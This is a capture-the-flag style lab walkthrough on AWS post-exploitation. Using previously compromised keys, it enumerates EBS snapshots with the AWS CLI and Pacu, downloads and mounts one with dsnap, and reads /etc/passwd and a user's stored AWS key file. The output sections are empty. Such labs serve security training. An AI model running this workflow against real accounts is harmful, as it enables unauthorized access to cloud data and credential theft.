Using the aws configure, we set up the AWS keys of the AWS account previously compromised in Lab 1. As we don’t know the region name, keep the default (us-east-1)
aws configure
Output:
We then execute the AWS caller identity command in order to retrieve the UserID, Username, and the Account ID.
aws sts get-caller-identity
Output:
From the output we can observe that we have tomas access keys and the Account ID is 999143725571.
Based on the tomasnotes file (Lab 1), it’s seems that tomas is waiting for his EBS Snapshot to be ready. In other words, he is waiting for an EC2 volume to be backed up.
Since we don’t know the region name, let’s execute our first attempt to discover EC2 snapshots in the “us-east-1” region. (Subsequently we can try one by one all 32 AWS regions.)
It should be noted that the –owner-id is the AccountID that we found before and is required in order to be able to retrieve only the snapshots available for our account id.
aws ec2 describe-snapshots --region us-east-1 --owner-id 999143725571
Output:
We are not authorised to perform describe-snapshots in region us-east-1
Second attempt to discover EC2 snapshot in the “us-east-2” region returns snapshots details.
aws ec2 describe-snapshots --region us-east-2 --owner-id 999143725571
Output:
Enumeration can also be done automatically using a tool such as Pacu. Open a new tab on your terminal, go to Tools/pacu and run the cli.py. Then press 0 to create a New Session, name it tomasebs and press enter.
cd Desktop/Tools/pacu
./cli.py
Output:
Then import your existing AWS keys into pacu and run ebs module enumeration:
> import_keys --all
> run ebs__enum_volumes_snapshots --account-ids 999143725571
Output:
The snapshot has been found. Another powerful tool for downloading and enumerating EBS snapshots is dsnap by Rhino Security.
dsnap --region us-east-2 list
Output:
Then download the snapshot:
dsnap --region us-east-2 get snap-05093cd5707afde19
It should be noted that the snapshot is 8 GB and will take some time to be downloaded.
Output:
After downloading the snapshot, navigate to Desktop/Tools/dsnap/ and run the following command to run it in a docker. (It will take some time to mount it):
cd Desktop/Tools/dsnap
sudo IMAGE=home/cb8000/snap-05093cd5707afde19.img make docker/run
Searching through the snapshots, user account “tomas_sysadmin” caught our attention. Probing through the user’s home directory revealed a set of AWS keys we can utilise later on.
><fs> cat /etc/passwd
Output:
Enumerating the tomas_sysadmin home directory we ended up on AWS keys.
ls /home/tomas_sysadmin
ls /home/tomas_sysadmin/mykeys
cat /home/tomas_sysadmin/mykeys/mykeys.txt
Output: